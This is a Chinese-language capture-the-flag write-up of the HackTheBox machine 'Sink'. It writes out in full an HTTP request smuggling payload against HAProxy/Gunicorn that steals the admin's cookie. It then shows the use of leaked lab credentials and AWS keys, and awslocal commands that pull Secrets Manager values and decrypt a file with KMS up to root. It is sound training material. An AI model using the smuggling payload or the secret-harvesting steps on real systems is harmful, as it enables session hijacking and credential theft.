HackTheBox-Sink WP

insane难度初体验 & HTTP Smuggle攻击实操 & 云渗透学习


0x01 信息收集

nmap -sC -sV -v 10.10.10.22

发现端口22、3000、5000开启

HackTheBox-Sink WP


访问3000端口,可以看到为某代码托管平台:

HackTheBox-Sink WP


目前没有用户名和密码,但是explore可以发现存在的三个账户信息:

HackTheBox-Sink WP


目光转向5000端口,注册并进行登录:

HackTheBox-Sink WP


对该网站进行探索,发现的交互点如下:

  1. 首页最底下的评论功能:

HackTheBox-Sink WP


  1. 首页的搜索功能:

HackTheBox-Sink WP


  1. 笔记功能

HackTheBox-Sink WP


另外还能发现admin账户的信息:

HackTheBox-Sink WP


对这些存在交互的地方测试XSS,SQLi,SSTI,未果。


转变思路,先抓个包看看,可以发现存在的服务器信息,可以发现后端是gunicorn,然后代理使用了haproxy

HackTheBox-Sink WP



0x02 突破口

Google一下,可以看到HAProxy存在HTTP走私漏洞:

HackTheBox-Sink WP

对那篇文章进行总结,于此题而言,攻击原理和要点如下:

  1. 正常情况下,对TE(Transfer-Encoding)头的优先级高于CL(Content-Length)头

  2. 在特殊字符\v的干扰下,haproxy没能识别出TE头,故遵照CL头的指示将构造的数据包中的所有内容发给了后端即Gunicorn。

  3. Gunicorn不受\v的影响,因而将按TE头的指示以chunked的方式处理HTTP数据包。这种不一致造成了HTTP Smuggling攻击。

  4. 在实操过程中,默认的Connection头部值为close,我们需要将其改成keep-alive。这样会有更大概率接到admin用户提交的请求。


实操开始,首先建议在burp中开启对不可打印字符的显示:

HackTheBox-Sink WP


然后我们在TE头处插入\v ,方法是先用base64编码,然后在Burp中解码:

printf \\x0b | base64
#输出 Cw==

插入\v之后继续构造请求,步骤如下:

  1. 按chunked方式构造请求,注意结束块处是0\r\n\r\n
  2. 将一个正常的数据包贴在下面,msg留空来接收数据
  3. 更改第一个数据包的Connection头部值为keep-alive
  4. 更改第二个数据包的CL头为一个较大的值,不然可能拿不到Cookie

构造完成的数据包如下:

POST /comment HTTP/1.1
Host: 10.10.10.225:5000
Content-Length: 793
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.225:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.225:5000/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gitea=4218005f51d57007; _csrf=yEJpf7F8mA2tBXrSAu9dix741N86MTYzMjg4MzMxMjczNzA0NTY5MQ; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YVPnOg.hkrTsumKBoyp1jpSwxnWouyrNug
Connection: keep-alive
Transfer-Encoding: chunked

8
msg=test
0

POST /comment HTTP/1.1
Host: 10.10.10.225:5000
Content-Length: 300
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.225:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.225:5000/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gitea=4218005f51d57007; _csrf=yEJpf7F8mA2tBXrSAu9dix741N86MTYzMjg4MzMxMjczNzA0NTY5MQ; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YVPnOg.hkrTsumKBoyp1jpSwxnWouyrNug

msg=

HackTheBox-Sink WP


发送数据包,拿到Cookie,替换后以admin账户身份登录站点:

HackTheBox-Sink WP


在admin的note处可以发现三条凭证信息:

HackTheBox-Sink WP


分别如下:

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

第二条记录可以让我们登录进3000端口的gitea。

在Explore中,可以看到该代码托管平台中存在的4个repo:

HackTheBox-Sink WP


其中,在Key_Management项目下的ec2.php中查看提交的历史记录,可以发现开发人员由于失误上传的私钥文件:

HackTheBox-Sink WP


HackTheBox-Sink WP

以及aws的access_idaccess_secret

HackTheBox-Sink WP


HackTheBox-Sink WP


保存私钥,chmod 600 后登录之,成功,拿到user.txt:

HackTheBox-Sink WP


0x03 David’s shell

查看一下网络连接状态:

netstat -tulnp #这条命令能够看到docker容器,初步排查后确定这不是我们的关注点

netstat -tulnp | grep 127 # 只看127.0.0.1

HackTheBox-Sink WP

可以看到有个4566端口,结合之前我们发现的代码,不难推测上面跑着一个aws服务。

HackTheBox-Sink WP


但这个地址有些奇怪,搜一下4566端口,可以发现有个localstack,查找资料后得知这就是一个模拟aws云服务的应用,用于云应用的开发和测试。

HackTheBox-Sink WP


然后看下命令,可以发现有awsawslocal

awsawslocal的区别是aws需要指定endpoint,awslocal不用。awslocal会直接和localstack进行对话。

HackTheBox-Sink WP


对aws渗透中常见的lambdacloudwatchs3api函数进行测试,发现似乎都没开启相应的服务:

awslocal lambda list-functions
awslocal cloudwatch list-dashboards
awslocal s3api list-buckets

HackTheBox-Sink WP


由于如上项目与logs有关,使用命令logs模块下的命令对logs进行探索。

如果不清楚命令的话,aws的读命令大多与get、list、describe有关,搜索如下关键字即可快速帮助我们确定命令

awslocal logs help| grep -E 'list|get|describe'

HackTheBox-Sink WP


使用命令

awslocal logs describe-log-groups

可以找到一个log-group

HackTheBox-Sink WP


进一步通过该log-group,可以找到一个log-stream

awslocal logs describe-log-streams --log-group-name cloudtrail

HackTheBox-Sink WP

再进一步查看,得到一些有意思的事件名称:

awslocal logs get-log-events --log-group-name cloudtrail --log-stream-name 20201222

HackTheBox-Sink WP


Google一下,可以发现和aws的Secrets Manager有关:

HackTheBox-Sink WP


同时aws的cli也有该命令

HackTheBox-Sink WP

同样地,先看看有用的命令:

awslocal secretsmanager help| grep -E 'list|get|describe'

HackTheBox-Sink WP


然后使用之前泄露的access_idaccess_secret进行配置:

HackTheBox-Sink WP


配置之后尝试列出所有的secrets:

awslocal secretsmanager list-secrets

HackTheBox-Sink WP


之后分别拿到secrets的value值:

awslocal secretsmanager get-secret-value --secret-id 'Jenkins Login'
awslocal secretsmanager get-secret-value --secret-id 'Sink Panel'
awslocal secretsmanager get-secret-value --secret-id 'Jira Support'

HackTheBox-Sink WP


对具有登录权限的用户进行查看,发现有root、marcus、david。刚好上面拿到的账号中也有一个david。

HackTheBox-Sink WP


使用密码登录,拿到david的shell:

HackTheBox-Sink WP


0x04 提权至root

在david家目录的某个文件夹底下能够发现一个servers.enc文件:

HackTheBox-Sink WP


那就想着法子解密咯。回到之前的gitea,在Key_Management目录下能够发现有一个keys.php,可以看出它在与aws的kms服务进行交互:

HackTheBox-Sink WP

Google一下,可以发现是aws的密钥管理服务,里面可能有我们想要的东西:

HackTheBox-Sink WP


回到服务器,查看可用的命令:

awslocal kms help| grep -E 'get|describe|list'

HackTheBox-Sink WP


首先看下存在的密钥:

awslocal kms list-keys

HackTheBox-Sink WP


先查看某一密钥的详细信息:

awslocal kms describe-key --key-id 0b539917-5eff-45b2-9fa1-e13f0d2c42ac

HackTheBox-Sink WP


可以观察到有一Keystate字样,我们需要查找KeystateEnabled的密钥。

写个简单的shell语句进行查找:

for i in $(awslocal kms list-keys | grep KeyId | awk -F\" '{print $4;}'); do awslocal kms describe-key --key-id $i | grep -E 'KeyId|Enabled' ; echo; done;

HackTheBox-Sink WP


StateEnabled状态的key进行查看:

awslocal kms describe-key --key-id 804125db-bdf1-465a-a058-07fc87c0fad0
awslocal kms describe-key --key-id c5217c17-5675-42f7-a6ec-b5aa9b9dbbde

HackTheBox-Sink WP


我们使用第一个命令对得到的文件进行解密。首先使用help命令查看decrypt方法的使用

aws kms decrypt help

HackTheBox-Sink WP


对着example构造我们的语句即可:

HackTheBox-Sink WP


awslocal kms decrypt --ciphertext-blob fileb://servers.enc --key-id 804125db-bdf1-465a-a058-07fc87c0fad0 --encryption-algorithm RSAES_OAEP_SHA_256

HackTheBox-Sink WP


将得到的base64语句解码放进文件里,并使用file命令查看文件类型:

echo <base64code> | base64 -d > result
file result

HackTheBox-Sink WP


解压后继续查看文件类型:

mv result result.gz
gzip -d result.gz
ll
file result

HackTheBox-Sink WP

继续解压即可拿到密码:

mv result result.tar
tar -xvf result
cat servers.yml

HackTheBox-Sink WP


拿到此密码即可登录root用户:

HackTheBox-Sink WP

上一篇:第五章 常用的输入输出函数


下一篇:《SAFe 4.0参考指南:精益软件与系统工程的规模化敏捷框架》一3.2 敏捷团队